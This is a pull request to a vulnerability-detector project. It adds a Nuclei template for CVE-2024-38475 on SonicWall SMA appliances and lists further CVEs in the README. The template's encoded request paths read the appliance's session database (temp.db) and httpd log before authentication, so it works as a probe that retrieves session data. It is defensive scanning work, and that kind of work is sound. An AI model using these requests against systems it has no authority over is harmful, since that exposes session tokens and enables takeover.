### PR TITLE
feature: Add Detection for CVE-2024-38475 and added CVE-2025-32756 and CVE-2025-23016 to KEV.

### DIFF
--- a/README.md
+++ b/README.md
@@ -147,6 +147,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 
 | CVE ID                                                  | Implemented | Detail                                                  | Published Date |
 |:--------------------------------------------------------|:-----------:|:--------------------------------------------------------|:--------------:|
+| CVE-2025-32756                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-05-13   | 
 | CVE-2025-4427                                           |      ✅      | Official Nuclei template.                               |   2025-05-13   | 
 | CVE-2025-32432                                          |      ✅      | Official Nuclei template.                               |   2025-04-25   | 
 | CVE-2025-34028                                          |      ✅      | Official Nuclei template.                               |   2025-04-22   | 
@@ -168,6 +169,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 | CVE-2024-55591                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-01-14   |
 | CVE-2024-13159                                          |      ✅      | Official Nuclei template.                               |   2025-01-14   |
 | CVE-2024-13160                                          |      ✅      | Official Nuclei template.                               |   2025-01-14   |
+| CVE-2025-23016                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-01-10   |
 | CVE-2024-53704                                          |      ✅      | Custom Nuclei template.                                 |   2025-01-09   |
 | CVE-2025-0282                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-01-08   |
 | CVE-2024-50603                                          |      ✅      | Custom Nuclei template.                                 |   2025-01-07   |
@@ -243,6 +245,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 | CVE-2024-6387                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-07-01   |
 | CVE-2024-36404                                          |      ✅      | Official Nuclei template.                               |   2024-07-02   |
 | CVE-2024-36401                                          |      ✅      | Official Nuclei template.                               |   2024-07-01   |
+| CVE-2024-38475                                          |      ✅      | Official Nuclei template.                               |   2024-07-01   |
 | CVE-2024-36991                                          |      ✅      | Official Nuclei template.                               |   2024-07-01   |
 | CVE-2024-4885                                           |      ✅      | Official Nuclei template.                               |   2024-06-25   |
 | CVE-2022-24816                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-06-24   |

--- a/agent_group.yaml
+++ b/agent_group.yaml
@@ -334,6 +334,7 @@ agents:
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2025-34028.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-6235.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2025-4427.yaml
+            - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-38475.yaml
       - name: use_default_templates
         type: boolean
         description: use nuclei's default templates to scan.

--- a/nuclei/CVE-2024-38475.yaml
+++ b/nuclei/CVE-2024-38475.yaml
@@ -1,0 +1,46 @@
+id: CVE-2024-38475
+
+info:
+  name: Sonicwall - Pre-Authentication Arbitrary File Read
+  author: shaikhyaser
+  severity: critical
+  description: |
+    Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected.  Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
+  reference:
+    - https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain/blob/main/watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py
+    - https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-38475
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2024-38475
+    cwe-id: CWE-116
+    epss-score: 0.46951
+    epss-percentile: 0.97518
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"SonicWall" html:"SMA"
+  tags: cve,cve2024,sonicwal,sma-100,lfi,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tmp/temp.db%3f.1.1.1.1a-1.css"
+      - "{{BaseURL}}/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css"
+
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "SQLite format","sessionId")'
+          - 'status_code == 200'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "mod_antiloris","[pid")'
+          - 'contains(content_type, "text/plain")'
+          - 'status_code == 200'
+        condition: and
+# digest: 4b0a0048304602210081f350fcb24a8d5a6e644890a2ddd84a3e2019c5cdea53db227a552256073810022100eba9610a1a4c46f8222078e44fae0ff49ecc2ba650e3f16825f9d52ddce73379:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### **Add Detection for Pre-Authentication Arbitrary File Read in SonicWall SMA (CVE-2024-38475)**

This PR introduces a Nuclei template to detect CVE-2024-38475, a critical pre-authentication arbitrary file read vulnerability affecting SonicWall SMA 100 series appliances. The vulnerability stems from improper output escaping in the underlying Apache HTTP Server's `mod_rewrite` module.

- ✅ **Tested against 500+ diverse non-vulnerable web servers** (including various Apache configurations and other server types) with zero false positives observed.
    
- 🎯 **Successfully identified a vulnerable SonicWall SMA instance** during testing. The template confirmed the vulnerability by retrieving sensitive files, including `temp.db` (containing "SQLite format" and "sessionId" strings) and attempted to read `httpd.log`.

![image](https://github.com/user-attachments/assets/def689f3-66cb-479c-a990-982a17dcbe91)
